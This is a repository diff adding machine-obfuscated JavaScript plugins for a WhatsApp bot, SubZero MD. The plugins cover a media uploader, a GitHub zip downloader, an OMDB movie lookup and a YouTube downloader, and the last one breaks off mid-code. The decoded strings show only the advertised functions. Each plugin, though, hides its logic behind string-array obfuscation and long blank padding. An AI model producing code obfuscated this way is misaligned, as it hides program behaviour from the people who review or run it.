_0x124964=_0x70b4bd[_0x3d849a(0x199)]?_0x70b4bd[_0x3d849a(0x199)]:_0x70b4bd,_0x2697f0=(_0x124964[_0x3d849a(0x19d)]||_0x124964)['mimetype']||'';if(!_0x2697f0)throw _0x3d849a(0x195);let _0x596e03=await _0x124964['download'](),_0x234380=path[_0x3d849a(0x184)](os[_0x3d849a(0x193)](),_0x3d849a(0x18a));fs[_0x3d849a(0x19c)](_0x234380,_0x596e03);let _0x82228=new FormData();_0x82228[_0x3d849a(0x17e)](_0x3d849a(0x192),fs[_0x3d849a(0x197)](_0x234380));let _0x39c838=await axios['post'](_0x3d849a(0x1a1),_0x82228,{'headers':{..._0x82228['getHeaders']()}});if(!_0x39c838[_0x3d849a(0x185)]||!_0x39c838['data'][_0x3d849a(0x185)]||!_0x39c838[_0x3d849a(0x185)]['data'][_0x3d849a(0x194)])throw _0x3d849a(0x196);let _0x42c3a6=_0x39c838[_0x3d849a(0x185)][_0x3d849a(0x185)][_0x3d849a(0x194)];fs[_0x3d849a(0x18c)](_0x234380),_0x70b4bd[_0x3d849a(0x198)](_0x3d849a(0x1a2)+_0x596e03['length']+_0x3d849a(0x191)+_0x42c3a6+_0x3d849a(0x183));}catch(_0x54369b){_0x4cd1a1(''+_0x54369b),console['log'](_0x54369b);}});
|
plugins/dl-gitclone.js
ADDED
@@ -0,0 +1,217 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
|
3 |
+
$$$$$$\ $$\
|
4 |
+
$$ __$$\ $$ |
|
5 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
6 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
7 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
8 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
9 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
10 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
11 |
+
|
12 |
+
Project Name : SubZero MD
|
13 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
14 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
15 |
+
Support : wa.me/18062212660
|
16 |
+
*/
|
17 |
+
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
|
209 |
+
|
210 |
+
|
211 |
+
|
212 |
+
|
213 |
+
|
214 |
+
|
215 |
+
|
216 |
+
|
217 |
+
const _0x23b038=_0x4f2a;function _0x18d8(){const _0x532efd=['sender','⚠️\x20Invalid\x20GitHub\x20link.','720541YgbHfW','HEAD','*📥\x20DOWNLOADING\x20REPOSITORY...*\x0a\x0a*REPOSITORY:*\x20','error','13LNtOyD','log','643820eECHLf','Download\x20GitHub\x20repository\x20as\x20a\x20zip\x20file.','application/zip','sendMessage','4644xtYwSf','Where\x20is\x20the\x20GitHub\x20link?\x0a\x0aExample:\x0a.gitclone\x20https://github.com/mrfrank-ofc/SUBZERO-MD','❌\x20Failed\x20to\x20download\x20the\x20repository.\x20Please\x20try\x20again\x20later.','569046mxkRSl','❄️\x20sᴜʙᴢᴇʀᴏ\x20ᴍᴅ\x20❄️','8gYEyik','Repository\x20not\x20found.','11ctcJvu','\x0a\x0a>\x20*©\x20Gᴇɴᴇʀᴀᴛᴇᴅ\x20Bʏ\x20SᴜʙZᴇʀᴏ*','4788iiVDQh','content-disposition','.zip','headers','match','gitclone','downloader','18183096IQCdlb','\x0a*FILENAME:*\x20','Invalid\x20GitHub\x20URL.','17804OMaTnn','../command','120363304325601080@newsletter','1577214KBhKMf','705ojdYrl','6ZCBbbd','git','test','get'];_0x18d8=function(){return _0x532efd;};return _0x18d8();}(function(_0x2dc202,_0x2189f0){const _0x261e95=_0x4f2a,_0x595a37=_0x2dc202();while(!![]){try{const _0x117e42=-parseInt(_0x261e95(0xc3))/0x1+-parseInt(_0x261e95(0xd0))/0x2*(parseInt(_0x261e95(0xbd))/0x3)+parseInt(_0x261e95(0xb8))/0x4*(-parseInt(_0x261e95(0xbc))/0x5)+-parseInt(_0x261e95(0xcd))/0x6*(-parseInt(_0x261e95(0xd6))/0x7)+-parseInt(_0x261e95(0xd2))/0x8*(-parseInt(_0x261e95(0xbb))/0x9)+parseInt(_0x261e95(0xc9))/0xa*(parseInt(_0x261e95(0xd4))/0xb)+parseInt(_0x261e95(0xdd))/0xc*(parseInt(_0x261e95(0xc7))/0xd);if(_0x117e42===_0x2189f0)break;else _0x595a37['push'](_0x595a37['shift']());}catch(_0x1c3951){_0x595a37['push'](_0x595a37['shift']());}}}(_0x18d8,0x59a14));function hi(){const _0x2e7058=_0x4f2a;console[_0x2e7058(0xc8)]('Hello\x20World!');}function _0x4f2a(_0x9bb215,_0x31d011){const _0x18d8c3=_0x18d8();return _0x4f2a=function(_0x4f2a29,_0x706d69){_0x4f2a29=_0x4f2a29-0xb6;let _0x59b050=_0x18d8c3[_0x4f2a29];return _0x59b050;},_0x4f2a(_0x9bb215,_0x31d011);}hi();const {cmd}=require(_0x23b038(0xb9)),fetch=require('node-fetch');cmd({'pattern':_0x23b038(0xdb),'alias':[_0x23b038(0xbe)],'desc':_0x23b038(0xca),'react':'📦','category':_0x23b038(0xdc),'filename':__filename},async(_0x49ffeb,_0x5cee91,_0x319d74,{from:_0x7d39c8,quoted:_0x2ffc7b,args:_0x30dbe6,reply:_0x39beb1})=>{const _0x540dd1=_0x23b038;if(!_0x30dbe6[0x0])return _0x39beb1(_0x540dd1(0xce));if(!/^(https:\/\/)?github\.com\/.+/[_0x540dd1(0xbf)](_0x30dbe6[0x0]))return _0x39beb1(_0x540dd1(0xc2));try{let _0x860bec=/github\.com\/([^\/]+)\/([^\/]+)(?:\.git)?/i,[_0x41dc06,_0x4d66a1,_0x782acb]=_0x30dbe6[0x0][_0x540dd1(0xda)](_0x860bec)||[];if(!_0x4d66a1||!_0x782acb)throw new Error(_0x540dd1(0xb7));let _0xbc5f52='https://api.github.com/repos/'+_0x4d66a1+'/'+_0x782acb+'/zipball',_0x1e0964=await fetch(_0xbc5f52,{'method':_0x540dd1(0xc4)});if(!_0x1e0964['ok'])throw new Error(_0x540dd1(0xd3));let _0x14b4bb=_0x1e0964[_0x540dd1(0xd9)][_0x540dd1(0xc0)](_0x540dd1(0xd7)),_0x17b642=_0x14b4bb?_0x14b4bb[_0x540dd1(0xda)](/filename=(.*)/)[0x1]:_0x782acb+_0x540dd1(0xd8);_0x39beb1(_0x540dd1(0xc5)+_0x4d66a1+'/'+_0x782acb+_0x540dd1(0xb6)+_0x17b642+_0x540dd1(0xd5)),await _0x49ffeb[_0x540dd1(0xcc)](_0x7d39c8,{'document':{'url':_0xbc5f52},'fileName':_0x17b642+'.zip','mimetype':_0x540dd1(0xcb),'contextInfo':{'mentionedJid':[_0x5cee91[_0x540dd1(0xc1)]],'forwardingScore':0x3e7,'isForwarded':!![],'forwardedNewsletterMessageInfo':{'newsletterJid':_0x540dd1(0xba),'newsletterName':_0x540dd1(0xd1),'serverMessageId':0x8f}}},{'quoted':_0x5cee91});}catch(_0x26158d){console[_0x540dd1(0xc6)](_0x26158d),_0x39beb1(_0x540dd1(0xcf));}});
|
plugins/dl-movie.js
ADDED
@@ -0,0 +1,217 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
|
3 |
+
$$$$$$\ $$\
|
4 |
+
$$ __$$\ $$ |
|
5 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
6 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
7 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
8 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
9 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
10 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
11 |
+
|
12 |
+
Project Name : SubZero MD
|
13 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
14 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
15 |
+
Support : wa.me/18062212660
|
16 |
+
*/
|
17 |
+
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
|
209 |
+
|
210 |
+
|
211 |
+
|
212 |
+
|
213 |
+
|
214 |
+
|
215 |
+
|
216 |
+
|
217 |
+
const _0x58fbe6=_0x232f;(function(_0x2504d0,_0x5787f0){const _0xf378a7=_0x232f,_0x169e40=_0x2504d0();while(!![]){try{const _0x434753=parseInt(_0xf378a7(0xc6))/0x1*(-parseInt(_0xf378a7(0xbc))/0x2)+-parseInt(_0xf378a7(0xa2))/0x3*(parseInt(_0xf378a7(0xb7))/0x4)+parseInt(_0xf378a7(0xc2))/0x5*(-parseInt(_0xf378a7(0xab))/0x6)+parseInt(_0xf378a7(0xbb))/0x7+-parseInt(_0xf378a7(0xc4))/0x8*(-parseInt(_0xf378a7(0xb5))/0x9)+-parseInt(_0xf378a7(0xa7))/0xa*(parseInt(_0xf378a7(0xce))/0xb)+parseInt(_0xf378a7(0xb4))/0xc*(parseInt(_0xf378a7(0xcb))/0xd);if(_0x434753===_0x5787f0)break;else _0x169e40['push'](_0x169e40['shift']());}catch(_0x3da1fa){_0x169e40['push'](_0x169e40['shift']());}}}(_0x16ec,0x70dab));function _0x16ec(){const _0x28c9a6=['969ynzrKe','\x0a✍️\x20*Writer:*\x20','Genre','OMDB_API_KEY','data','3259150KvmtkF','\x0a🗳️\x20*IMDB\x20Votes:*\x20','\x0a📆\x20*Released:*\x20','Language','4566SqYjCA','log','\x0a⭐\x20*IMDB\x20Rating:*\x20','http://www.omdbapi.com/?t=','Response','Rated','Title','get','📽️\x20Please\x20provide\x20the\x20name\x20of\x20the\x20movie.','48hjSPtz','9jWVVGA','🚫\x20Movie\x20not\x20found.','11380CRURgS','Writer','sendMessage','\x0a📅\x20*Year:*\x20','721966AhnkDf','86990JVNBGy','\x0a🎬\x20*Director:*\x20','Director','\x0a🎬\x20*Movie\x20Information*\x20🎬\x0a\x0a🎥\x20*Title:*\x20','\x0a🎭\x20*Genre:*\x20','Runtime','465nELCIr','\x0a🎭\x20*Actors:*\x20','3661608trgtYd','Year','3MGiEpv','message','Hello\x20World!','Country','False','4379440yrFJxP','\x0a🌍\x20*Language:*\x20','N/A','11MKeIVY','utility','\x0a🌟\x20*Rated:*\x20','\x0a📝\x20*Plot:*\x20','axios','Poster','❌\x20Error:\x20','\x0a⏳\x20*Runtime:*\x20'];_0x16ec=function(){return _0x28c9a6;};return _0x16ec();}function hi(){const _0x494594=_0x232f;console[_0x494594(0xac)](_0x494594(0xc8));}function _0x232f(_0x1b64b6,_0x1fc69c){const _0x16ec2f=_0x16ec();return _0x232f=function(_0x232fd7,_0x44c77d){_0x232fd7=_0x232fd7-0x9e;let _0x32f0cb=_0x16ec2f[_0x232fd7];return _0x32f0cb;},_0x232f(_0x1b64b6,_0x1fc69c);}hi();const axios=require(_0x58fbe6(0x9e)),{cmd}=require('../command'),config=require('../config');cmd({'pattern':'movie','desc':'Fetch\x20detailed\x20information\x20about\x20a\x20movie.','category':_0x58fbe6(0xcf),'react':'🎬','filename':__filename},async(_0x30b3c6,_0x515a99,_0x5072ee,{from:_0x1cf542,quoted:_0x5f0f27,body:_0x4377b0,isCmd:_0x408541,command:_0x5502d7,args:_0x48babc,q:_0x184f9e,isGroup:_0x4ccb51,sender:_0x264efd,senderNumber:_0x125583,botNumber2:_0x1ff554,botNumber:_0x3af6a5,pushname:_0x1b2b6e,isMe:_0x2e37a3,isOwner:_0x371cba,groupMetadata:_0x3cc6f7,groupName:_0x21e802,participants:_0x45d3cf,groupAdmins:_0x1f986a,isBotAdmins:_0x5822f6,isAdmins:_0x413263,reply:_0x346617})=>{const _0x700030=_0x58fbe6;try{const _0x46cfe0=_0x48babc['join']('\x20');if(!_0x46cfe0)return _0x346617(_0x700030(0xb3));const _0x529df9=_0x700030(0xae)+encodeURIComponent(_0x46cfe0)+'&apikey='+config[_0x700030(0xa5)],_0x1d50e2=await axios[_0x700030(0xb2)](_0x529df9),_0x2d445c=_0x1d50e2[_0x700030(0xa6)];if(_0x2d445c[_0x700030(0xaf)]===_0x700030(0xca))return _0x346617(_0x700030(0xb6));const _0x5339d4=_0x700030(0xbf)+_0x2d445c[_0x700030(0xb1)]+_0x700030(0xba)+_0x2d445c[_0x700030(0xc5)]+_0x700030(0xd0)+_0x2d445c[_0x700030(0xb0)]+_0x700030(0xa9)+_0x2d445c['Released']+_0x700030(0xa1)+_0x2d445c[_0x700030(0xc1)]+_0x700030(0xc0)+_0x2d445c[_0x700030(0xa4)]+_0x700030(0xbd)+_0x2d445c[_0x700030(0xbe)]+_0x700030(0xa3)+_0x2d445c[_0x700030(0xb8)]+_0x700030(0xc3)+_0x2d445c['Actors']+_0x700030(0xd1)+_0x2d445c['Plot']+_0x700030(0xcc)+_0x2d445c[_0x700030(0xaa)]+'\x0a🇺🇸\x20*Country:*\x20'+_0x2d445c[_0x700030(0xc9)]+'\x0a🏆\x20*Awards:*\x20'+_0x2d445c['Awards']+_0x700030(0xad)+_0x2d445c['imdbRating']+_0x700030(0xa8)+_0x2d445c['imdbVotes']+'\x0a',_0x1600d5=_0x2d445c[_0x700030(0x9f)]&&_0x2d445c[_0x700030(0x9f)]!==_0x700030(0xcd)?_0x2d445c['Poster']:config['ALIVE_IMG'];await _0x30b3c6[_0x700030(0xb9)](_0x1cf542,{'image':{'url':_0x1600d5},'caption':_0x5339d4+'\x0a>\x20©ᴘᴏᴡᴇʀᴇᴅ\x20ʙʏ\x20sᴜʙᴢᴇʀᴏ'},{'quoted':_0x515a99});}catch(_0x64d199){console['log'](_0x64d199),_0x346617(_0x700030(0xa0)+_0x64d199[_0x700030(0xc7)]);}});
|
plugins/dl-play2.js
ADDED
@@ -0,0 +1,47 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
|
2 |
+
|
3 |
+
/*
|
4 |
+
|
5 |
+
$$$$$$\ $$\
|
6 |
+
$$ __$$\ $$ |
|
7 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
8 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
9 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
10 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
11 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
12 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
13 |
+
|
14 |
+
Project Name : SubZero MD
|
15 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
16 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
17 |
+
Support : wa.me/18062212660
|
18 |
+
*/
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
const _0x8fdd9b=_0x1326;(function(_0x2e4c9f,_0x116f1a){const _0x145e95=_0x1326,_0x550374=_0x2e4c9f();while(!![]){try{const _0x1221ac=-parseInt(_0x145e95(0x11d))/0x1+parseInt(_0x145e95(0x109))/0x2*(-parseInt(_0x145e95(0x122))/0x3)+-parseInt(_0x145e95(0x10e))/0x4+-parseInt(_0x145e95(0x110))/0x5+parseInt(_0x145e95(0xfd))/0x6+-parseInt(_0x145e95(0x116))/0x7+-parseInt(_0x145e95(0x11c))/0x8*(-parseInt(_0x145e95(0x114))/0x9);if(_0x1221ac===_0x116f1a)break;else _0x550374['push'](_0x550374['shift']());}catch(_0x250aee){_0x550374['push'](_0x550374['shift']());}}}(_0x2458,0xdb425));function hi(){const _0x1211a9=_0x1326;console[_0x1211a9(0xf8)]('Hello\x20World!');}hi();function hi(){const _0x5052dc=_0x1326;console[_0x5052dc(0xf8)]('Hello\x20World!');}function _0x1326(_0x94ea3b,_0x1d5290){const _0x2458a4=_0x2458();return _0x1326=function(_0x1326e0,_0x508878){_0x1326e0=_0x1326e0-0xf8;let _0x237954=_0x2458a4[_0x1326e0];return _0x237954;},_0x1326(_0x94ea3b,_0x1d5290);}function _0x2458(){const _0x1693b7=['yt-search','ytvid2','join','3209912tpsxeh','*Please\x20provide\x20a\x20video\x20tital\x20or\x20url*','2531125xykyoR','videos','result','axios','42391341DIZvzb','*Please\x20provide\x20a\x20audio\x20title\x20or\x20url*','4342198GedHxj','ytplay2','../command','video','video/mp4','❌\x20Failed\x20to\x20fetch\x20video\x20for\x20\x22','8hqiBiD','1324261OFaAFC','play2','error','length','sendMessage','107871LtveEP','log','❌\x20An\x20error\x20occurred\x20while\x20processing\x20your\x20request.','ytvideo2','url','ytv2','2472318JkKYwY','>©\x20sᴜʙZᴇʀᴏ\x20ɢᴇɴᴇʀᴀᴛɪɴɢ\x20sᴏɴɢ2\x20ᴘʟᴇᴀsᴇ\x20ᴡᴀɪᴛ...','data','video2','audio/mp4','yta2','get','https://api.giftedtech.web.id/api/download/dlmp4?apikey=gifted&url=','Download\x20audio\x20from\x20YouTube\x20by\x20searching\x20for\x20keywords.','https://api.giftedtech.web.id/api/download/dlmp3?apikey=gifted&url=','music','Download\x20videos\x20from\x20YouTube\x20by\x20searching\x20for\x20keywords.','54Dvpnva','> ©\x20sᴜʙZᴇʀᴏ\x20ɢᴇɴᴇʀᴀᴛɪɴɢ\x20ᴠɪᴅᴇᴏ\x20ᴘʟᴇᴀsᴇ\x20ᴘᴀɪᴛ...'];_0x2458=function(){return _0x1693b7;};return _0x2458();}hi();const {cmd,commands}=require(_0x8fdd9b(0x118)),yts=require(_0x8fdd9b(0x10b)),axios=require(_0x8fdd9b(0x113));cmd({'pattern':_0x8fdd9b(0x100),'alias':[_0x8fdd9b(0x10c),_0x8fdd9b(0xfc),_0x8fdd9b(0xfa)],'react':'⏳','desc':_0x8fdd9b(0x108),'category':_0x8fdd9b(0x119),'use':'.vidx\x20<keywords>','filename':__filename},async(_0xe2f6b0,_0xc0bd08,_0x122f70,{from:_0x4938ec,args:_0x545fb3,reply:_0x290209})=>{const _0x2e6af7=_0x8fdd9b;try{const _0x32deeb=_0x545fb3[_0x2e6af7(0x10d)]('\x20');if(!_0x32deeb)return _0x290209(_0x2e6af7(0x10f));_0x290209(_0x2e6af7(0x10a));const _0x5e6ce9=await yts(_0x32deeb);if(!_0x5e6ce9[_0x2e6af7(0x111)]||_0x5e6ce9[_0x2e6af7(0x111)][_0x2e6af7(0x120)]===0x0)return _0x290209('❌\x20No\x20results\x20found\x20for\x20\x22'+_0x32deeb+'\x22.');const _0x8cec1e=_0x5e6ce9[_0x2e6af7(0x111)][0x0],_0x5ce282=_0x8cec1e['url'],_0x2af2d2=_0x2e6af7(0x104)+_0x5ce282,_0x442320=await axios['get'](_0x2af2d2);if(!_0x442320[_0x2e6af7(0xff)]['success'])return _0x290209(_0x2e6af7(0x11b)+_0x32deeb+'\x22.');const {download_url:_0x503033}=_0x442320[_0x2e6af7(0xff)][_0x2e6af7(0x112)];await 